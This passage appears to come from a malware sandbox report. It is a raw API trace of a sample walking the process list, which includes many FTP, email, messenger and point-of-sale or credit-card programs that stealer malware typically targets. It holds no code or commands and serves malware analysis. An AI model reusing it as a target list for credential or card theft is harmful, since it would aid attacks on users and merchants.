cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.506] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.507] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.509] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.510] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.513] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.515] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.516] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.518] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.519] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.521] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.523] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.524] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0236.526] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0236.577] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.579] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.581] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0236.582] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0236.583] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0236.585] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.586] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.588] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0236.589] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.592] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.593] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0236.595] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0236.596] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0236.598] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0236.599] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0236.601] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0236.602] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0236.604] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0236.605] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0236.607] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0236.608] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0236.610] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0236.612] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0236.613] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0236.615] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0236.616] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0236.618] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0236.619] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0236.621] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0236.639] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0236.640] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0236.642] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0236.644] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0236.645] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0236.647] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0236.648] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0236.650] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0236.652] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0236.654] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0236.656] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0236.657] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0236.659] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0236.661] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0236.663] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0236.664] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0236.666] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0236.668] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0236.670] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0236.672] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0236.673] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0236.675] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0236.677] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0236.678] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0236.680] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0236.682] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0236.716] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0236.718] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0236.720] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0236.722] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0236.723] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0236.725] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0236.727] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0236.728] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0236.730] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0236.732] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0236.733] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0236.735] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0236.736] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0236.738] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0236.740] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 